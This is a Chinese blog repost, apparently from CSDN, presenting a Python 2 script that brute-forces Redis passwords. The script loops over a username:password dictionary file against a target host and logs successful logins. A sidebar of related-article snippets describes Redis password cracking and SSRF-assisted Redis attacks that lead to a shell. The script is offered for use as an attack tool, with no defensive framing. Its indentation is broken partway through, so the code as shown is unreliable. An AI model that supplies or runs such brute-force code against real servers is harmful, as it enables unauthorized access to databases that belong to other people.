用python 编写redis 暴力破解密码的程序

最新推荐文章于 2024-02-04 15:21:01 发布
最新推荐文章于 2024-02-04 15:21:01 发布
阅读量2.3k 收藏
点赞数
文章标签: 数据库 python
原文链接:http://www.cnblogs.com/daphnezhu/p/9723710.html
版权 
本文摘自http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/ 

import redis
import logging

LOGIN_TIMEOUT = 12


class RedisAuth:
  #初始化
    def __init__(self, (host, port)):
        self.addr = (host, port)
        print self.addr
  #login函数,有三个参数,self,username,password
    def login(self, username='', password=''):
        conn_ok, auth_ok, banner = False, False, ''
        connection = None
        try:
       #连接redis
       #redis.StrictRedis(host='localhost', port=6379, db=0, password=None, socket_timeout=None, connection_pool=None, charset='utf-8', 
        errors='strict', decode_responses=False, unix_socket_path=None)
            connection = redis.StrictRedis(host=self.addr[0], port=self.addr[1],password=password,db=0, socket_connect_timeout=LOGIN_TIMEOUT)
            conn_ok = True
            auth_ok = True
            print password
            info = connection.info()
            banner = str(info)
            logging.getLogger().warn('FOUND %s:%s@%s:%d<OK>' % (username, password, self.addr[0], self.addr[1]))
        except Exception as e:
            es = str(e)
            if es.find('Password') >= 0:
                conn_ok = True
            else:
                conn_ok = False
                logging.getLogger().info('ERR:1 %s:%d %s' % (self.addr[0], self.addr[1], es))
                print es
        del connection   #删除变量connection
        return conn_ok, auth_ok, banner


class RedisBruteTester:
    def __init__(self, userdict, passwords=None):
        self.userdict = userdict
        pass

    def test(self, task):
        (host, port) = (task[0], task[1])
        rs = []
        auth = RedisAuth((host, port))
# print self.userdict
 for username in self.userdict:
 for password in self.userdict[username]:
 conn_ok, auth_ok, banner = auth.login(username, password)
 print conn_ok,auth_ok,banner
 if not conn_ok:
# return rs
 continue
 if not auth_ok: 
            continue 
         rs.append([host, port, 'REDIS', username, password, banner]) 
         break 
    if not rs: 
      logging.getLogger().info('SAFE %s:%d' % (host, port)) 
    return rs


if __name__ == '__main__': 
  host,port = "需要暴力破解的host",int('6379') 
  userdict = dict() 
  for ln in open('c:\\redis_userpasswd.txt'): 
    fs = ln.strip().split(':', 1) 
    if len(fs) != 2: 
      continue 
    username = fs[0] 
    password = fs[1] 
    if username not in userdict: 
      userdict[username] = set() 
    userdict[username].add(password) 
    # logger = xutils.initLogger('.\\pass\\redis.txt') 
  tester = RedisBruteTester(userdict) 
  rs = tester.test((host, port)) 
  if rs == []: 
    print('Faild') 
  else: 
    print(rs)

转载于:https://www.cnblogs.com/daphnezhu/p/9723710.html

weixin_30642029
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Spring Boot + Redis: 实现密码暴力破解
2301_79125642的博客
08-13 44
public class Solution { /** * 代码中的类名、方法名、参数名已经指定,请勿修改,public class Solution { /** * 代码中的类名、方法名、参数名已经指定,请勿修改,class Solution { public: /** * 代码中的类名、方法名、参数名已经指定,请勿修改,直接返回方法规定的值即可。#晒一晒我的offer# #牛客解忧铺# #牛客在线求职答疑中心# #晒一晒我的offer# #我的求职思考#
redis密码破解(python使用redis模块)
Focus on k8s and python
12-28 2013
         昨天用socket模块写了个破解redis密码的脚本,今天用Python redis模块在写了个,同一个密码文本,发现redis模块速度明显不如socket模块,代码如下: #!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 18-12-27 下午9:20 # @Site : # @File : ...
redis密码破解(python使用socket模块)
Focus on k8s and python
12-27 1547
         偶尔看到一篇讲述redis未授权访问漏洞的,提到用hydra进行redis密码的破解。测试了下,发现安装的hydra竟然无法破解出密码,且速度很慢(hydra版本 v8.2-dev)。     如上图,用一个for循环生成个随机密码测试文件,将正确密码写入。 如上图,hydra竟然没破解出密码,不知道是不是bug,而且一分钟才运行差不多10000次密码猜测。而redi...
Java redis 暴力破解漏洞 简单限制用户登录
zhongzih的博客
05-29 297
处理方案 redis 设置对应的缓存有效期为60秒。然后每次登录的时候查询登录失败次数。超过5次不查询数据库,直接返回报错。漏洞名称:暴力破解漏洞。
基于Python Django及Redis的微信小程序后台接口源码
最新发布
03-25
项目简介:本项目采用Python语言开发,基于Django框架和Redis数据库,构建了一套微信小程序的后台接口。该源码包含共计5723个文件,其中主要文件类型包括: - Python源文件(.py):1528个,为主要业务逻辑实现; -...
pythonredis数据库连接与使用
08-17
pythonredis数据库连接与使用
Python获取Redis所有Key以及内容的方法
09-09
今天小编就为大家分享一篇Python获取Redis所有Key以及内容的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
Python使用Redis实现作业调度系统(超简单)
12-24
Redis是一个开源,先进的key-value存储,并用于构建高性能,可扩展的Web应用程序的完美解决方案。 Redis从它的许多竞争继承来的三个主要特点: Redis数据库完全在内存中,使用磁盘仅用于持久性。 相比许多键值数据...
Redis分布式锁python-redis-lock使用方法
01-21
python-redis-lock 多个redis客户端访问同一个redis服务端,控制并发。 github:https://pypi.org/project/python-redis-lock/ 在使用这个库之前,需要安装如下: pip install python-redis-lock 使用锁的示例: ...
redis可视化界面(破解版)
01-07
下载解压即可用
手把手教你用python打造redis扫描器,支持多线程批量扫描
The code way of kinnisoy
04-13 1246
Table of Contents 预备知识 一、大端模式与小端模式 二、IP地址的不同表现形式 1.字符串表现形式 2.整数表现形式 3.大小端模式下的IP地址 三、Python的socket库 1.socket.socket(family,type) 2.socket.connect(address) 3.socket.connect_ex(address) 4.s...
redis密码修改
wsyzxss的博客
10-22 5661
临时修改密码: https://blog.csdn.net/wsyzxss/article/details/82753465   配置文件修改密码: 打开 解压后的redis文件夹下; 修改redis.conf文件; # ,把# requirepass foobared,修改下; 把 # 去掉,foobared 替换成自己的密码, 如   vi redis.conf 搜索命...
Python3 15行代码破解Redis密码(不提供密码库)
weixin_42366275的博客
01-04 439
文章目录一、所需Python库二、code 一、所需Python库 1.redis(pip install redis) 二、code import redis with open(r'C:\Users\hot\Desktop\密码库.txt', "rb") as passfile: # 读取txt文件 while True: line = passfile.readline() if not line: break
redis用户名口令爆破
wilson_xpp的博客
04-13 4440
# coding:utf-8 import redis import logging LOGIN_TIMEOUT = 12 class RedisAuth: def __init__(self, (host, port)): self.addr = (host, port) def login(self, username='', password='')...
SSRF+Redis认证攻击(暴力破解
qq_43665434的博客
04-03 1265
SSRF+Redis认证攻击(暴力破解) 随风潜入夜,润物细无声。 实验环境 主机 角色 描述 centos8 受害服务器 运行redis数据库(含认证密码) window10 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf+redis暴力破解获取centos8的shell 工具: Redis nc wireshark tcpdump python3 实验流程 登录redis,设置认证密码: config set requirepass qianxun con
记录Redis的一次攻击事件
孤城长烟
03-12 2487
买了阿里云的一台服务器自己玩的,今天发现Redis被攻击了,执行crontab的时候,发现莫名其妙的任务。一开始也搞不懂哪里被攻击了,上午查了一下,刚好看到一篇关于redis被攻击的文章。结合自己的情况,发现果然是这样的。
3、安全开发-Python-协议库爆破&FTP&SSH&Redis&MYSQL&SMTP等
m0_65842464的博客
02-04 2012
原理:python的一些库支持FTP、SSH、Redis、SMTP、Mysql等协议远程登录,只需要知道该服务器ip和端口,然后用本机准备好的用户名字典和密码字典进行循环组合尝试爆破登录,其中字典的好坏决定成功的几率,可以尝试弱口令集和社工方式获取,当然也不一定能成功,这只是锄头,挖不挖的进取决于是什么地。
使用 Python 操作 Redis 数据库
很酷的站长的博客
01-30 2654
redispython 访问 Redis 数据库的模块。在第 5 行,使用方法 hdel(‘person’, ‘gender’) 删除哈希表 ‘person’ 中的键 ‘gender’在第 6 行,redis 数据库返回的是字节对象 b’ZhangSan’,而不是字符串 ‘ZhangSan’在第 1 行,使用方法 sismember(‘set’, ‘b’) 检查集合 ‘set’ 是否包含 ‘b’在第 3 行,使用方法 sismember(‘set’, ‘d’) 检查集合 ‘set’ 是否包含 ‘d’
python redis取对象 密码
12-21
以下是使用Python操作Redis的示例代码: ```python import redis # 连接Redis r = redis.Redis(host='127.0.0.1', port=6379, db=0, password='123456') # 获取所有的key key_list = r.keys('*') # 遍历key列表 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值